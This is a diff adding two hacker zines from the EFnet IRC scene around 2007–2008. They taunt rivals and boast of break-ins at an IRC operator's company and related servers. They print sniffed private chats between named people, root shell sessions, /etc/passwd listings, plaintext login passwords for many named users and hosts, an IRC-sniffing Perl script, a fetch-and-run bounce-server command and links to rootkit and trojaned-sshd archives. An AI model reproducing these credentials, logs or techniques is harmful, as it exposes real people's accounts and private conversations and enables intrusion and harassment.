it as bounce anymore! (kinda late) +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho +-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario +-> PRIVMSG skotch :pra sniffa +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :n to usando mais importec faz tempo +-> PRIVMSG skotch :fica ligeiro +-> PRIVMSG skotch :eu formatei ele +-> PRIVMSG skotch :deproposito +-> PRIVMSG skotch :ele veio no meu pvt +-> PRIVMSG skotch :colo uma pa de merda +-> PRIVMSG skotch :ele sabe da ig +-> PRIVMSG skotch :da locaweb +-> PRIVMSG skotch :da pop +-> PRIVMSG skotch : n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha ownado sozinho +-> PRIVMSG skotch :e vice versa +-> PRIVMSG skotch :q seja +-> PRIVMSG skotch :ouytra coisa +-> PRIVMSG skotch :peguei coisa quente +-> PRIVMSG skotch :sshd +-> PRIVMSG skotch :hehehe +-> PRIVMSG skotch :remote expl +-> PRIVMSG skotch :openbsd local ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on milw0rm, asshole) +-> PRIVMSG skotch :tu fica de putaria +-> PRIVMSG skotch :agente perdendo tempo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :o openbsd vc a mando faz tempo +-> PRIVMSG skotch :mas esse novo nao +-> PRIVMSG skotch :entra na merda do msn +-> PRIVMSG skotch :e para de putaria +-> PRIVMSG skotch :por besteira +-> PRIVMSG skotch :vou te desblokear ->>>>>>>>> i'll unblock ya from msn babe! plz come back ! +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to indo pro trampo +-> PRIVMSG skotch :vai para com a putaria de merda ? +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :quem fica de putaria eh vc, falando bosta sem saber de nada +-> PRIVMSG skotch : * +-> PRIVMSG skotch : * eXstacy ~ # gcc sshexploit.c -o sshex -lssh +-> PRIVMSG skotch : * eXstacy ~ # ./sshex -h laggy.org -l xxxxx -d keys/ ->>>>>>> w0w, this is certainly a 0day, right ? /me rolling on the floor laughing +-> PRIVMSG skotch : * [!] KEY FOUND! +-> PRIVMSG skotch : * [!] Logging in... +-> PRIVMSG skotch : * Last login: Fri Aug 15 16:05:43 2008 from xxxxxxxxxxxxxxxxx +-> PRIVMSG skotch : * xxxxx@digitaljunk ~ $ +-> PRIVMSG skotch : * +-> PRIVMSG skotch : * Not that practical since it doesnt use threads, but the code shows +-> PRIVMSG skotch : * howto make a ssh client from scratch using libssh for what purpose +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :procura se informar primeiro antes de falar merda +-> PRIVMSG skotch :so joguei verde +-> PRIVMSG skotch :sou noiado +-> PRIVMSG skotch :vc tb he +-> PRIVMSG skotch :normal +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :esse ai eh um bruteforce q usa um bug do ssh +-> PRIVMSG skotch :nao fiz mal nenhum pra vc +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pode demorar horas pra achar a key certa +-> PRIVMSG skotch :nao +-> PRIVMSG skotch :de 5 a 10 min +-> PRIVMSG skotch :o coideloko ja ta melhorando ele +-> PRIVMSG skotch :pra demorar menos +-> PRIVMSG skotch :hehe +-> PRIVMSG skotch :a oi ta bugada +-> PRIVMSG skotch :ele FUNCIONA +-> PRIVMSG skotch :e jaja +-> PRIVMSG skotch :to com 0day pra samba +-> PRIVMSG skotch :aguarde +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so falo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pra vc fica esperto +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :q tem gringo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :te sniffando +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :pq fikei sabendo +-> PRIVMSG skotch :ta loko ? +-> PRIVMSG skotch :so se for na bnc +-> PRIVMSG skotch :hehehe +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :nego q ta falando com vc +-> PRIVMSG skotch :ateh entao nao ligo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :soh pra causar intriga +-> PRIVMSG skotch :porra +-> PRIVMSG skotch :tu eh meu amigo ou nao eh :? +-> PRIVMSG skotch : so falo +-> PRIVMSG skotch : pra vc fica esperto +-> PRIVMSG skotch : q tem gringo +-> PRIVMSG skotch : te sniffando +-> PRIVMSG skotch : pq fikei sabendo +-> PRIVMSG skotch :qm sniffando ? +-> PRIVMSG skotch :skotch +-> PRIVMSG skotch :fala krl +-> PRIVMSG skotch :skotch +-> PRIVMSG skotch :skotch +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :to comend mermao +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e to atrasado pro trampo +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :flw +-> PRIVMSG skotch :cara +-> PRIVMSG skotch :se tu continuar folgado +-> PRIVMSG skotch :naovaidar +-> PRIVMSG skotch :vai sew fude +-> PRIVMSG skotch :fala direito +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :isso eh facil de vc descobrir, so vc ver quem se aproximo de vc +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :ultimamente +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :e n trocava ideia antes +<- :skotch!~skotch@d0nt.bl4m3.4.l33tzor.org PRIVMSG r47 :so vc pensar +-> PRIVMSG skotch :whatever +-> PRIVMSG skotch :vc +-> PRIVMSG skotch :e o thomaz +-> PRIVMSG skotch :sao os unicos +-> PRIVMSG skotch :q tem as m erda q tenho +-> PRIVMSG skotch :UNICOS +-> PRIVMSG skotch :mais ngm tem +-> PRIVMSG skotch :nao confio em m ais NGM +-> PRIVMSG skotch :eu acho q tu deveria me falar qm eh +-> PRIVMSG skotch :so isso +-> PRIVMSG skotch :e troquei de bnc ontemrs +-> PRIVMSG skotch :e troquei de bnc ontem rs ->>>>>> i changed my bnc yesterday! (we're glad) +-> PRIVMSG rip :skotch said to me that are sniffing me +-> PRIVMSG rip :but skotch dont know about nothing ->>>>>> as always, backstabbing hiZ boyfriend(skotch) + + +/* + * Geminid IIb. TCP/UDP/ICMP Packet flooder + * + * What can i say? Enjoy! :) + * gr33tz: PoWerPr0 and godmode0 + * + +thanks for the gem source by the way! + +>>> there could be more logs, but some kool guyz cant stop ddosing r47, so this is kind of boring to do +>> anyway, if we get something else in the future, we will publish again. thanks buddies. +> random logs if you have nothing to do: http://labsec.elite.vc/r47-1.log http://labsec.elite.vc/r47-2.log + +########################################################################## +# __ __ __ __ # +#.----.| |--.---.-.-----.| |_.-----.----. | |_| |--.----.-----.-----.# +#| __|| | _ | _ || _| -__| _| | _| | _| -__| -__|# +#|____||__|__|___._| __||____|_____|__| |____|__|__|__| |_____|_____|# +# |__| # +# # +# - download links # +########################################################################## + +<><> thiZ iZ ZeRIouZ buZInEzZ dewD! +<><> http://labsec.elite.vc/x0x0x-suckY-sshd.tar.bz2 +<><> http://labsec.elite.vc/x0x0x-suckY-phalanx-suckit.tar.bz2 +<><> http://labsec.elite.vc/x0x0x-suckY-shells-ips-users-allinone.tar.bz2 [we are not sharing all of them, just some random ones] + +<><> please guyZ, make it priv8 ! (/me rolleyes :B) + +- kool&klean chapter. + +########################################################################## +# _ _ ___ # +# ___ | |_ ___ ___ _| |_ ___ _ _ | | '___ _ _ _ _ # +# / | '| . |<_> || . \ | | / ._>| '_> | |-/ . \| | || '_> # +# \_|_.|_|_|<___|| _/ |_| \___.|_| |_| \___/`___||_| # +# |_| # +# # +# - conclusion # +########################################################################## + + +----------------- reflection time +>.......... whats the point of all this ? prove that you are better than someone ? +>......... what a joke. just coz you are lucky and had the chance it doesnt mean you are bl4ckh47. +>........ your zines are pathetic. what the fuck is this 'messages' shit in the bottom of them ? +>....... like you are able to hack someone by yourself, eh ? you cant do shit x0x0x, you ARE shit. +>...... why thank soldiers and all blackhats? you dont belong to any of them, none of them like you. +>..... why would someone send you a mail? nobody cares about you, dipshit. +>.... i cant really believe that you spent time creating a new mail just koz of your second shit zine, hahahahaha what a joke +>... stop playing hacker, you are not hacker, - we are not hackers -, you cant even do shellscript, get a life while you can. +>.. a kiss to zmda +>. think twice before you fuck with us, asshole. we know you, we know what you can do, and we know what you cant do. +> just to finish: + +******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ******************************** +; +; +; _____ __ _______ +;| |_.---.-.| |--.| __|.-----.----. +;| | _ || _ ||__ || -__| __| +;|_______|___._||_____||_______||_____|____| +; +; _______ __ __ __ +;|_ _|.-----.--| |.--.--.-----.| |_.----.|__|.-----.-----. +; _| |_ | | _ || | |__ --|| _| _|| || -__|__ --| +;|_______||__|__|_____||_____|_____||____|__| |__||_____|_____| +; ; +; +; #LABSEC @ EFNET - closed to friends, of course. +; +; klux/djow - include - input - r3n4t0 - memelo - deadcow - w3b - kernel` - kylebond - fseek +; +; lAmE ZiNE wRitTeN bY: +; +; klux - spoof1 @RR0B@ gmail.com - hAppY flOodiNg +; +; +; wE iZ watCHiNg U +******************************** m355 w17h 7h3 beZt - diE liKE th3 r3s7 ******************************** + diff --git a/x0x0x/x0x0x2.txt b/x0x0x/x0x0x2.txt new file mode 100644 index 0000000..e796eb0 --- /dev/null +++ b/x0x0x/x0x0x2.txt @@ -0,0 +1,1404 @@ +#!/local/efnet/el8/efnet/corporation +################################################ +### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### +### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### +### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### +################################################ +# # +# # +# ÛÛÛÛ ÛÛÛÛ # +# ÛÛ± ÛÛ ÛÛ± ÛÛ² # +# ÛÛÛ ÛÛ ±ÛÛ ±Û° °ÛÛ ÛÛ ÛÛ ±ÛÛ °ÛÛ ÛÛ° # +# ÛÛ²ÛÛ ²ÛÛ °Û² °Û²ÛÛ ÛÛ °ÛÛ °Û²ÛÛ° # +# ÛÛÛ ²ÛÛ °Û± ÛÛÛ ÛÛ °ÛÛ ÛÛÛ # +# °ÛÛÛ± ±ÛÛ ±Û° ÛÛÛ± ÛÛ ±ÛÛ ÛÛÛ± # +# ÛÛ°ÛÛ ÛÛ± ÛÛ ²Û°ÛÛ ÛÛ± ÛÛÛ ²Û°ÛÛ² # +# ÛÛ² ÛÛ ÛÛÛÛ ²Û² ÛÛ ÛÛÛÛ ²Û² ÛÛ² # +# # +################################################ +# # +# .: second zine :. # +# # +# [ tribute to efnet el8 corp ] # +# # +# # +# date: december 2007 # +# update: march 2008 # +# # +# # +#<><><><><><><><><><><><><><><><><><><><><><><># +# # +# -= always keeping the secret identify =- # +# # +#<><><><><><><><><><><><><><><><><><><><><><><># + + .''. + (~~~~) + || + __||__ +/______\ + | |' _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ + | |'|o| - - - - - - - - - - - - - - - - - - - - - - - - -|| + | |'| | || + | |'| | . ' . || + | |'| | . ' ' . || + | |'| | . ' .-'"'-. ' . || + | |'| | . ' ," ". ' . || + |r |'| | . ' /: x0x0x :\ ' . || + |s |'| | . ' ; . x0x0x ; ' . || + |t |'| | ' . \: ..x0x0x :/ . ' || + | |'| | ' . `. . . ,/ . ' || + | |'| | ' . `-.,,.-' . ' || + | |'| | ' . . ' || + | |'| | ' . . ' || + | |'| | ' || + | |'|o|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_|| + | |' + | |' + | |' united by brazil - 100% BRAZUKAAAAAAAAAAAA + | |' + '~~' + + + +\\ // + A long time ago, most part of 'leet' user of efnet network didnt like brazilians, + saying they are 'packet kiddies', 'lammers'. these 'leet' users start to believe + about it, but they think all .br guys was that! So we have the idea of laugh of + these 'leet boys' and start to publish to everbody see what really happens on + efnet! hehehe + Some passwords we´ll not publish, only to avoid surprises in our access! + They are smart! but! we´re looking at them! +// \\ + + + +*/ + + TARGETS : SHELL ACCOUNTS && EFNUT HUXORS && IRCOPS && EFNET SERVERS + + /* + + + + +STEVOO w45 h4ck3d... oMG iRcop Admin HackEd ??? Yeah.. She/HE Is!! + +Stevoo / Stefan !! PoOoooooooooooooWWwwww !!! Results: http://img149.imageshack.us/img149/356/stevootn3.jpg + + +login as: root +root@83.140.180.6's password: +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + +[root@quagga ~]# uname -a;ifconfig;cat /etc/passwd|grep bash + +Linux quagga.webguidepartner.com 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux + + + +#0h 5ur3 n0w w3 4r3 47 stevoo m41n 53rv3r!! okk stevooooooooo =****!!! n0w w3 wi11 5n1ff u! + + + +[root@quagga ~]# cat /etc/passwd|grep bash +root:x:0:0:root:/root:/bin/bash +zabbix:x:1001:1001:,,,:/home/zabbix:/bin/bash +stevoo:x:1002:1002:Stefan Larsson,,,:/home/stevoo:/bin/bash +lunkan:x:1000:1000:,,,:/home/lunkan:/bin/bash +ftp:x:112:65534::/home/ftp:/bin/bash +moffe:x:1003:1003:,,,:/home/moffe:/bin/bash +j-dog:x:1004:1004:,,,:/home/j-dog:/bin/bash +mac:x:1005:1005:,,,:/home/mac:/bin/bash +irc:x:1006:1006:,,,:/home/irc:/bin/bash +ustas:x:1007:1007:,,,:/home/ustas:/bin/bash +dubkat:x:1008:1008:,,,:/home/dubkat:/bin/bash +sonny:x:1009:1009:,,,:/home/sonny:/bin/bash +flyguy:x:1010:1010:,,,:/home/flyguy:/bin/bash + + + +^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ +^~~~~~~~~~~~~~~~~FINDING NEMOOOOOOOOOOO~~~~~~~~~~~~~~^ +^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^ ^^^^^^^^^^ ^^^^^ + + _ + (_) + | . + . |L /| . _ + _ . |\ _| \--+._/| . (_) + / ||\| Y J ) / |/| ./ + J |)'( | ` F`.'/ _ + -<| F __ .-< (_) + | / .-'. `. /-. L___ + J \ < \ | | O\|.-' _ + _J \ .- \/ O | | \ |F (_) + '-F -<_. \ .-' `-' L__ +__J _ _. >-' )._. |-' +`-|.' /_. \_| F + /.- . _.< + /' /.' .' `\ + /L /' |/ _.-'-\ + /'J ___.---'\| + |\ .--' V | `. ` + |/`. `-. `._) + / .-.\ +VK \ ( `\ + `.\ + + +[root@quagga ~]# cd /l4m3d1r/; cat p455w0rdz.txt + + +WIKI +---------------- +user = putumayo +pass = utE09X2 + +FINALTEST +----------------- +user = finaltest +pass = FINAL06tst + +POKERLISTINGS.COM +-------------------------------- +user = turbonegro +pass = eFb9KLm + +POKER USER +-------------------- +user = poker +pass = kLmn09Q3 + +ROOT +---- +user = root +pass = 5aB197cQ +NEW = UZk9Taj23 +----------------- + + + + +THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX +>>>>>>>>>>> AS YOU CAN SEE STEVOO IS A GOOD ADMIN! SAVING PASSWORDZ IN YOUR HOME FILEZZZZZZ <<<<<<<<<<<< +THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX + + + + +#dubkat 4nd sonny!!! g00d 74rg3755!!!!!! + + +#0kkk!! ch3ck1ng 1p5!!!!!!!!!! + + + +[root@quagga ~]# ifconfig +eth0 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 + inet addr:83.140.180.6 Bcast:83.140.180.255 Mask:255.255.255.0 + inet6 addr: fe80::213:72ff:fe7b:7bc9/64 Scope:Link + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + RX packets:383711035 errors:0 dropped:0 overruns:0 frame:0 + TX packets:476418783 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:3959576563 (3.6 GiB) TX bytes:1066088994 (1016.7 MiB) + Interrupt:169 + +eth0:0 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 + inet addr:83.140.180.2 Bcast:83.140.180.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + Interrupt:169 + +eth0:1 Link encap:Ethernet HWaddr 00:13:72:7B:7B:C9 + inet addr:83.140.180.151 Bcast:83.140.180.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 + + + +................................ +................................ +...................... +.................... hmmmmmmmmmmmmm 7h3 1p 15 u53d t0 c0nn3c7 70 efnet.port80.se!! l375 ch3ck ?!? +.................... + + + +## Just ip(83.140.180.2 ) can access port80.se, okay honey!! do that! + + +[root@quagga ~]# ssh -l root -b 83.140.180.2 efnet.port80.se +root@83.140.180.6's password: +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx + +[root@efnet ~]# uname -a + +FreeBSD efnet.port80.se 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Sat Nov 3 01:23:30 CET 2007 root@efnet.port80.se:/usr/obj/usr/src/sys/EFNET i386 + + + +#0hhhhhhhh g0dddddddddddddd!!! port80.se 0wn333333ddddddddddddd!!!! l000000000lllllllll!!!!! l375 ch3ck m4ch1n3 + + + + *********************************************** + ////////// ///////////\\\\\\\\\\ \\\\\\\\\\ + ////////// !!!ILEGAL TOOL FOUND!!! \\\\\\\\\\ +////////// //////////// \\\\\\\\\\\ \\\\\\\\\\ ++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + +[root@efnet xxxxx]# cat ircsniff.pl + +#!/usr/bin/perl + +if(@ARGV == 0) { + print "Args: $ARGV[0] [port]\n"; + exit(0); +} + +if(@ARGV == 1) { + $port = $ARGV[0]; + open(FH, "tshark -tad -lnx -d tcp.port==$port,irc -R 'irc' |") or die "Unable to open wireshark."; +} +my $packet = ""; + +while() { + chomp($_); + chomp($_); + + if($packet && /^$/) { + for(split /\r\n/, $packet) { + if(/(:[^ ]+ PRIVMSG .*)$/i) { + print "<- $1\n"; + } elsif(/(PRIVMSG .*)$/i) { + print "-> $1\n"; + } + } + $packet = ""; + } + + if(/^[\da-f]{4} (([\da-f]{2} ?)+) /) { + my $a = $1; + $a =~ s/([\da-f]{2})\s?/chr(hex($1))/eg; + $packet .= $a; + } +} +close(FH); + + + + + +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% +%%%%%%% +%%%% +%% later thay say that ircops dont sniffz this server on efnet! there this the test! +% + +% + + +% + + + + +Lets Joke: + +[root@quagga ~]# wget www.site.com/bnc.perl;perl bnc.perl 8000 st3v0 + +on irc: + +/server 83.140.180.6:8000 + +* Connecting to 83.140.180.6 (8000) +-216.47.178.108- *** [BNC 1.8-teste9 por 0ldW0lf - Atrix Team] +-216.47.178.108- *** Digite /QUOTE PASS +-216.47.178.108- *** Senha aceita. Bem vindo, administrador! +-216.47.178.108- *** Digite /QUOTE CONN [opções] +-216.47.178.108- *** Para lista os comandos da BNC digite /QUOTE BHELP +-BNC- [Admin LOG]: Usuário administrador logou + +/quote conn efnet.port80.se:6667 +/server efnet.port80.se +/nick stevoo_gay + +#get oper +/oper ***** ***** + + +#COOL stevoo@83.140.180.6 gets spoofed host!! + + +/msg #x0x0x h3110 w0r1d! + + +x0x0x_0wn is stevoo@127.0.0.1 * Stefan Larsson [STLA-RIPE] +x0x0x_0wn using efnet.port80.se We eat more pussy! +x0x0x_0wn is a beaver gourmet (Server Administrator) +x0x0x_0wn has been idle 5secs, signed on Mon Nov 05 16:36:48 +x0x0x_0wn End of /WHOIS list. + + + + +ll0000000000llllllllllllllllllllll!! stevoo u are the magic!!!! + + + + +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&& + +7w0 y34r5 5n1ff1ng ur h0m3 b0x stevoo , 7h3n w3 g37 s0m3 4cc355 , my fr13nd +1337´5 533 7h3n ? +x0x0x h4v3 100% 4cc355 1n ur 0wn n37w0rk, 4nd 07h3r5 + + + + ,` `/` `. ,\ + /` ` ' /, ' ,` \ + ` / ` ` ' ,.,`, + /-/- ``/= = \ ,` + '' ' @' @' ) \ + //|'/ ) |\ |\` + cf ( ,,',, ) + \__ -- _/ + `--' "STEVOO is synonymous of SUPERMAN!" Albert Einstein + + + + + ************************** tevoo + .*##*:*####***:::**###*:######*. tevoo + *##: .###* *######:,##* tevoo + *##: :####: *####*. :##: tevoo + *##,:########**********:, :##: tevoo + .#########################*, *#* tevoo + *#########################*##: tevoo + *##, ..,,::**#####: tevoo + ,##*,*****, *##* tevoo + *#########*########: tevoo + *##*:*******###* tevoo + .##*. ,##* tevoo + :##* *##, tevoo + *####: tevoo + :, tevoo + + +&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&&&&&&&&&&&& +&&&&&&&&&& +&&&& +&& +& + + +#Spain Host + + +[root@x0x0x ~]# ssh 91.142.209.1 +root@91.142.209.1's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux es.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + +#Australian Host + + +[root@x0x0x ~]# ssh 202.125.41.133 -l sonny.sarai +sonny.sarai@202.125.41.133's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux au.int.webguidepartner.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 athlon i386 GNU/Linux +bash# exit + + +#Flexservers is a box very important with importants files that i WONT publish !! lol : + + +[root@x0x0x ~]# ssh 213.239.174.129 +root@213.239.174.129 's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux flexserver.flexservers.com 2.6.22.9 #2 SMP Fri Oct 5 17:52:23 CEST 2007 i686 i686 i386 GNU/Linux +bash# exit + + +#German Host + + +[root@x0x0x ~]# ssh 80.86.82.231 -l sonny.sarai +sonny.sarai@80.86.82.231's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux de 2.6.16.1-amd-webperoni-06042006-1 #1 Thu Apr 6 17:01:51 CEST 2006 i686 athlon i386 GNU/Linux +bash# exit + + + + +#Idiot box good bandwith ## used to host my worm some days lol + + + +[root@x0x0x ~]# ssh 205.234.178.244 +root@205.234.178.244's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux lb1 2.6.15-2-amd64 #1 SMP Tue Aug 28 17:53:01 BST 2007 x86_64 GNU/Linux +bash# exit + + + +#Suomi Host + + + +[root@x0x0x ~]# ssh 217.30.189.33 +root@217.30.189.33's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux fi.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + +#Netherlands Host + + + +[root@x0x0x ~]# ssh 81.171.121.170 +root@81.171.121.170's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl) +bash# exit + + + + +#Netherlands Host + + + +[root@x0x0x ~]# ssh 217.30.189.33 +root@217.30.189.33's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl) +bash# exit + + + + +#Canada Host + + + +[root@x0x0x ~]# ssh 204.15.197.130 +root@204.15.197.130's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux gw.ca.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686 i686 i386 GNU/Linux +bash# /lib/ldd 2242 + +83.140.43.249 (per:5!vcAP8!) +83.140.43.49 (stefan:n1nj4h1978) *old pass of stevoo i wont said new pass!* + +bash# exit + + + + +#Malasya Host + + + +[root@x0x0x ~]# ssh 124.217.250.115 +root@124.217.250.115's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux my.int.webguidepartner.com 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux +bash# exit + + + + +#Spain Host + + + +[root@x0x0x ~]# ssh 75.126.49.137 +root@75.126.49.137's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux es.int.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux +bash# exit + + + + +#Usa gayl0rd Host + + + +[root@x0x0x ~]# ssh 69.20.4.41 +root@69.20.4.41's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux us.int.webguidepartner.com 2.6.9-42.0.2.EL #1 Thu Aug 17 17:36:53 EDT 2006 i686 athlon i386 GNU/Linux +bash# exit + + + + +#Malasya Host + + +of some boxes i will show some login:password to show that´s not fake! : (per:5!vcAP8!) (sonny.sarai:comp1409sonny) (stefan:n1nj4h1978) (root:JAk9Taj23) (h00h0h0) + + +[root@x0x0x ~]# ssh 74.53.191.130 +root@74.53.191.130's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash# uname -a +Linux webhostingsearch.com.theplanet.host 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 i686 i386 GNU/Linux (82.bf.354a.static.theplanet.com) +bash# exit + + +//idiots using same root password and personal logins in all boxes!! that´s love! + +#Dev dataBase Host + + + + +[root@x0x0x ~]# ssh 83.140.180.235 -l anna +root@83.140.180.235's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux devbase 2.6.18-53.1.4.el5PAE #1 SMP Fri Nov 30 01:21:20 EST 2007 i686 i686 i386 GNU/Linux + +bash# ssh acad23@204.200.222.171 +root@83.140.180.235's password: Eb11Be22 +[acad23@academicinfo.net ~]$ exit; + +bash# exit + + + +*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&( +#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&( + +#HAHHAHAHA "FULL HACK"0rz owned!! good hax0rs!! + +#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&( +*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&( + + + + + +[root@x0x0x ~]# ssh 83.140.33.134 -l stevoo +stevoo@83.140.33.134 's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux spark.bgpmonkey.net 2.6.20-1.2320.fc5 #1 Tue Jun 12 18:50:38 EDT 2007 i686 i686 i386 GNU/Linux + +bash# ssh acad23@204.200.222.171 (acad23:Eb11Be22) + +[acad23@academicinfo.net ~]$ exit; + +bash# exit + + + + +**************************** +############################ +**# +**# want get ircop? +*# +# try on fulhack irc: /oper stevoo bajs +# + + + + + + + +#Other shit + + + +[root@x0x0x ~]# ssh 83.140.2.18 -l per +per@83.140.2.18's password: xxxxxxxxxx + +Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx + +bash$ su root +Password: xxxxxx + +bash# uname -a +Linux 